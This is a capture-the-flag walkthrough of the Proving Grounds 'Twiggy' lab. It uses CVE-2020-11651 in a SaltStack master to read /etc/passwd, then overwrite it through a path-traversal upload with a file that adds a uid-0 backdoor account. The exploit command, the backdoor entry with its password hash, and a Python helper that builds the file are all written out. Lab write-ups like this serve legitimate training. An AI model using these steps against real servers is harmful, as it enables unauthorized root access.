Proving Grounds Practice — Twiggy
Hello, today I'll walk through my solution to the Proving Grounds Practice machine Twiggy.
First, I run an Nmap scan.
Then I examine the services on the open ports one by one.
After browsing the website on port 80, I tried some likely passwords on the admin login page, without success.
Port 8000 then gave me the following information.
I also started looking for exploits for the ZeroMQ service on ports 4505 and 4506, which are the default publish and request ports of a SaltStack master.
A Google search turned up two related vulnerabilities on the first page of results.
I went looking for exploit code for CVE-2020-11651, the authentication bypass in the Salt master's request server.
I downloaded the Python file from the link below.
When I ran it, it failed because the "salt" module was missing, so I installed that module and ran it again.
Although I tried to get a shell, I was unsuccessful. I noticed that the script can read arbitrary files from the master, so I continued by reading important files such as /etc/passwd.
I used the -h parameter to see what else the script could do and saw that it can also upload files. That means we can upload our own passwd file, which replaces /etc/passwd on the target.
Creating a Passwd File
- touch passwd
- Paste in the complete contents of the passwd file we read earlier (the upload replaces the whole file, so every original line must stay, or logins on the box break), then append our own entry as the last line.
- pwend:$1$r/5WEL9l$gr6/QAygoP4zISL2SSrfr1:0:0:root:/root:/bin/bash
- The second field is an MD5-crypt hash of the password we chose (123). Because it is a hash rather than "x", the system checks it directly instead of consulting /etc/shadow, and uid 0 / gid 0 make the account equivalent to root.
- The final version of the file we created:
Now we can upload the file. The destination is written as a path traversal because the script's upload lands relative to the master's file root.
python3 exploit.py --master 192.168.187.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
After uploading the file, we can SSH in with the username and password we created (pwend:123).
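To make the passwd-crafting step repeatable, and to catch the one mistake that really matters here (a malformed or truncated /etc/passwd locks everyone out, including you, because the upload replaces the whole file), here is a small helper. This is an added example written for this write-up, not code from the PoC script; it assumes you already hold a copy of the target's /etc/passwd read through the Salt master and a crypt(3)-style hash for your chosen password. The username and hash are the ones used above; SAMPLE_PASSWD is a constructed stand-in, not the real target's file.

```python
"""Craft a replacement /etc/passwd with an added uid-0 account and sanity-check
it before uploading. Example code for this write-up, not the PoC's own code."""

from typing import List

# Hash copied from the write-up: MD5-crypt ($1$) of the password "123".
PWEND_HASH = "$1$r/5WEL9l$gr6/QAygoP4zISL2SSrfr1"

# Constructed sample of a downloaded passwd file (not the target's real file).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
"""


def hash_password(password: str) -> str:
    """Return an MD5-crypt hash via the stdlib `crypt` module (removed in
    Python 3.13). If it is unavailable, generate the hash with
    `openssl passwd -1` instead and pass it to build_entry()."""
    try:
        import crypt
    except ImportError as exc:
        raise RuntimeError("crypt module unavailable; use `openssl passwd -1`") from exc
    return crypt.crypt(password, crypt.mksalt(crypt.METHOD_MD5))


def build_entry(user: str, pw_hash: str, uid: int = 0, gid: int = 0,
                gecos: str = "root", home: str = "/root",
                shell: str = "/bin/bash") -> str:
    """Build one passwd(5) line. uid/gid 0 make the account equivalent to root;
    a real hash in field 2 is checked directly instead of via /etc/shadow."""
    for field in (user, pw_hash, gecos, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError(f"field contains ':' or newline: {field!r}")
    return f"{user}:{pw_hash}:{uid}:{gid}:{gecos}:{home}:{shell}"


def inject_user(original: str, entry: str) -> str:
    """Append `entry` to the downloaded passwd content, keeping every original
    line: the upload replaces the whole file, so nothing may be dropped."""
    lines = [ln for ln in original.splitlines() if ln.strip()]
    user = entry.split(":", 1)[0]
    if any(ln.split(":", 1)[0] == user for ln in lines):
        raise ValueError(f"user {user!r} already exists")
    lines.append(entry)
    return "\n".join(lines) + "\n"


def validate_passwd(text: str) -> List[str]:
    """Reject anything that would make logins fail (wrong field count, bad
    uid/gid, duplicate user, missing root); return the uid-0 account names."""
    seen = set()
    root_users = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(fields)}")
        user, _pw, uid, gid, _gecos, _home, shell = fields
        if not user or user in seen:
            raise ValueError(f"line {n}: empty or duplicate user {user!r}")
        if not (uid.isdigit() and gid.isdigit()):
            raise ValueError(f"line {n}: non-numeric uid/gid")
        if not shell.startswith("/"):
            raise ValueError(f"line {n}: shell must be an absolute path")
        seen.add(user)
        if uid == "0":
            root_users.append(user)
    if "root" not in seen:
        raise ValueError("original root entry is missing")
    return root_users


def craft(original: str = SAMPLE_PASSWD, user: str = "pwend",
          pw_hash: str = PWEND_HASH) -> str:
    """Full workflow: append the backdoor entry and validate the result."""
    new = inject_user(original, build_entry(user, pw_hash))
    validate_passwd(new)
    return new


if __name__ == "__main__":
    result = craft()
    print(result, end="")
    # Write it out, then upload with the PoC's --upload-src / --upload-dest options.
    with open("passwd", "w") as fh:
        fh.write(result)
```

Run it against the passwd file you actually pulled from the target rather than the constructed sample; the validation step is what keeps you from uploading a file with a stray blank line or a missing root entry.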
Yes, we now have root and can read proof.txt.
We find our flag and complete the challenge. Keep hacking!
Practice makes perfect :)